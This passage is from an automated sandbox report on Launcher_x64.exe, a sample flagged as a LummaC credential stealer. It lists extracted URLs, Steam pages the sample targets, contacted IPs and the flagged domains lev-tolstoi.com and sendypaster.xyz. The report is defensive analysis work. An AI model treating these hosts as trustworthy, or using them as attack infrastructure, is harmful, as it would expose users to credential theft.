                                                                                                                		high
                                                                                                                https://steam.tv/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://lev-tolstoi.com/Launcher_x64.exe, 00000003.00000003.2456252406.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2556263712.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2555293768.0000000001036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://store.steampowered.com/privacy_agreement/Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://store.steampowered.com/points/shop/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://ocsp.rootca1.amazontrust.com0:Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Launcher_x64.exe, 00000003.00000003.2458400920.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2480922810.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2458317534.000000000364F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://sketchfab.comLauncher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.ecosia.org/newtab/Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://lv.queniujq.cnLauncher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLauncher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.youtube.com/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://store.steampowered.com/privacy_agreement/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://support.microsofLauncher_x64.exe, 00000003.00000003.2458317534.0000000003651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.google.com/recaptcha/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://checkout.steampowered.com/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesLauncher_x64.exe, 00000003.00000003.2458400920.0000000003623000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://store.steampowered.com/;Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/about/Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://steamcommunity.com/my/wishlist/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://steamcommunity.com/profiles/76561199724331900.Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://help.steampowered.com/en/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://steamcommunity.com/market/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://store.steampowered.com/news/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=eLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://lev-tolstoi.com/apipLauncher_x64.exe, 00000003.00000003.2456252406.0000000001036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgLauncher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2611002767.0000000001073000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2602917926.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2556263712.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2530628830.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2555293768.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2530449435.0000000001036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Launcher_x64.exe, 00000003.00000003.2458400920.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2480922810.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2458317534.000000000364F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://recaptcha.net/recaptcha/;Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://steamcommunity.com/discussions/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://store.steampowered.com/stats/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://medal.tvLauncher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comLauncher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://x1.c.lencr.org/0Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://x1.i.lencr.org/0Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallLauncher_x64.exe, 00000003.00000003.2458400920.0000000003623000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLauncher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433824621.000000000101F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://steamcommunity.com/workshop/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://login.steampowered.com/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://support.mozilla.org/products/firefoxgro.allLauncher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://store.steampowered.com/legal/Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://lev-tolstoi.com/1&0Launcher_x64.exe, 00000003.00000003.2456252406.0000000001036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgLauncher_x64.exe, 00000003.00000003.2503346324.00000000035F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high

                                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                              172.67.157.254
                                                                                                                                                                                                                                              		lev-tolstoi.comUnited States
                                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              193.143.1.9
                                                                                                                                                                                                                                              		sendypaster.xyzunknown
                                                                                                                                                                                                                                              		57271BITWEB-ASRUtrue
                                                                                                                                                                                                                                              23.55.153.106
                                                                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                              Analysis ID:1579566
                                                                                                                                                                                                                                              Start date and time:2024-12-23 01:16:06 +01:00
                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                              Overall analysis duration:0h 5m 24s
                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                              Number of analysed new started processes analysed:8
                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Sample name:Launcher_x64.exe
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@6/1@11/3
                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 66.7%
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 95%
                                                                                                                                                                                                                                              • Number of executed functions: 44
                                                                                                                                                                                                                                              • Number of non-executed functions: 128
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                              • Execution Graph export aborted for target Launcher_x64.exe, PID 4420 because there are no executed function
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                              19:17:04API Interceptor18x Sleep call for process: Launcher_x64.exe modified

                                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              172.67.157.254Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                      random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                          ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            https://t.co/nq9BYOxCg9Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                              193.143.1.9WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  23.55.153.106WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                                          8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                                              ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                  aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                    aqbjn3fl.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                      lev-tolstoi.comWonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                                      8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                                      ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                                      Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
